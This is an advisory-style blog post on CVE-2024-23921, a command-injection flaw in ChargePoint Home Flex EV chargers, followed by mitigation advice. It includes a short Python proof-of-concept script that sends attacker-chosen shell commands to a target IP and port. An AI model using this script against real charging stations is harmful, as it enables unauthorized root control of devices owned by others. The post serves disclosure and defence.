CVE-2024-23921 Revealed: ChargePoint Home Flex Charging Stations Vulnerable to Network-Adjacent Attacks

As the rise of electric vehicles continues, it is crucial to ensure the security of the charging infrastructure supporting them. In a recent discovery, a security flaw has been identified in ChargePoint Home Flex charging stations, which could possibly lead to unauthorized access and control by malicious attackers.

The vulnerability, designated as CVE-2024-23921, is a significant risk as it allows network-adjacent attackers to execute arbitrary code on affected installations without any authentication. The consequences range from simple denial of service to more severe, including alteration or access to sensitive data, and unauthorized control of the charging station.

The exploit details indicate that the specific flaw lies within the wlanapp module. The root cause is the lack of proper validation of a user-supplied string before using it to execute a system call. By leveraging this vulnerability, an attacker can execute code in the context of root, the highest-level user account on the system.

In the PoC code snippet below, one can observe how simple it is to exploit this vulnerability

import sys
import socket

def exploit(ip, port, cmd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    payload = "COMMAND|" + cmd + ";"
    sock.send(payload.encode('utf-8'))
    data = sock.recv(1024)
    sock.close()
    print(data.decode('utf-8'))

if __name__ == '__main__':
    if len(sys.argv) != 4:
        print("Usage: python3 CVE-2024-23921.py [target_ip] [port] [command]")
        sys.exit(1)
    target_ip = sys.argv[1]
    port = int(sys.argv[2])
    command = sys.argv[3]
    exploit(target_ip, port, command)

For additional information on this security flaw, please refer to the original references

- CVE-2024-23921
- ChargePoint Home Flex Vulnerability Advisory

As of now, no known fixes are available. ChargePoint users are advised to closely monitor all official communication channels for any updates regarding patches, mitigations, or workarounds for this vulnerability.

Additionally, users can take precautionary measures to minimize the risks associated with CVE-2024-23921:
1. Isolate the charging stations from untrusted networks, either by using a separate local network or implementing effective firewall rules.
2. Regularly update the firmware on your ChargePoint devices to ensure they are protected against any previously known vulnerabilities.
3. Educate facility and IT staff to be aware of potential security threats and best practices relating to EV charging stations.

In conclusion, maintaining security is of utmost importance in the rapidly evolving landscape of electric vehicles. It's essential to ensure that charging infrastructure, such as ChargePoint Home Flex stations, are designed and maintained with the latest security measures to protect users and their data from malicious attacks.

Timeline

Published on: 01/31/2025 01:15:09 UTC
Last modified on: 03/24/2025 17:15:16 UTC